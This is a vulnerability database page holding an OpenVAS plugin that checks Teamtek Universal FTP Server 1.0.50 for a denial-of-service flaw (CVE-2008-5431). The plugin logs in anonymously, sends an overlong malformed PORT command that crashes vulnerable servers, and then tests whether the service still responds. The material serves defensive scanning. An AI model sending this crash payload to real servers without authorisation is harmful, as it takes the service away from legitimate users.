Lucene search
+L

Teamtek Universal FTP Server <= 1.0.50 Multiple Commands DoS Vulnerabilities

🗓️ 16 Dec 2008 00:00:00Reported by Copyright (C) 2008 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 17 Views

Teamtek Universal FTP Server DoS Vulnerabilitie

Related
Refs
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2008-5431
11 Dec 200815:00
cve
cvelist
Cvelist
CVE-2008-5431
11 Dec 200815:00
cvelist
exploitdb
Exploit DB
UniversalFTP 1.0.50 - 'MKD' Remote Denial of Service
15 Nov 200600:00
exploitdb
euvd
EUVD
EUVD-2008-5408
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-5431
11 Dec 200815:30
nvd
prion
Prion
Command injection
11 Dec 200815:30
prion
# SPDX-FileCopyrightText: 2008 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.800322");
  script_version("2025-12-17T05:46:28+0000");
  script_tag(name:"last_modification", value:"2025-12-17 05:46:28 +0000 (Wed, 17 Dec 2025)");
  script_tag(name:"creation_date", value:"2008-12-16 16:12:00 +0100 (Tue, 16 Dec 2008)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_cve_id("CVE-2008-5431");
  script_name("Teamtek Universal FTP Server <= 1.0.50 Multiple Commands DoS Vulnerabilities");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2008 Greenbone AG");
  script_family("Denial of Service");
  script_dependencies("ftpserver_detect_type_nd_version.nasl");
  script_require_ports("Services/ftp", 21);
  script_mandatory_keys("ftp/teamtek/universal_ftp/detected");

  script_xref(name:"URL", value:"http://secunia.com/advisories/22553");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/27804");
  script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/archive/1/488142/100/200/threaded");

  script_tag(name:"impact", value:"Successful exploitation could allow remote attackers to crash the affected
  application, denying the service to legitimate users.");

  script_tag(name:"affected", value:"Teamtek, Universal FTP Server version 1.0.50 and prior on Windows.");

  script_tag(name:"insight", value:"The flaws are exists due to run-time error while executing CWD, LIST, PORT,
  STOR, PUT and MKD commands. These commands are not properly sanitised.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year
  since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
  options are to upgrade to a newer release, disable respective features, remove the product or
  replace the product by another one.");

  script_tag(name:"summary", value:"Universal FTP server is prone to multiple denial of service (DoS) vulnerabilities.");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"WillNotFix");

  exit(0);
}

include("ftp_func.inc");
include("port_service_func.inc");

port = ftp_get_port( default:21 );
banner = ftp_get_banner( port:port );
if( ! banner || "UNIVERSAL FTP SERVER" >!< banner )
  exit( 0 );

soc = open_sock_tcp(port);
if( ! soc ) {
  exit( 0 );
}

# Authenticate with anonymous user (Before crash)
if( ! ftp_authenticate( socket:soc, user:"anonymous", pass:"anonymous" ) ) {
  exit( 0 );
}

ftp_send_cmd( socket:soc, cmd:string("PORT AAAAAAAAAAAAAAAAA \r\n") );
sleep( 5 );
close( soc );

soc = open_sock_tcp( port );
if( ! soc ) {
  security_message( port:port );
  exit( 0 );
} else if( soc ) {
  # Re-authenticate with anonymous user (After crash)
  if( ! ftp_authenticate( socket:soc, user:"anonymous", pass:"anonymous" ) ) {
    security_message( port:port );
    exit( 0 );
  }
  close( soc );
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Dec 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
EPSS0.02732
17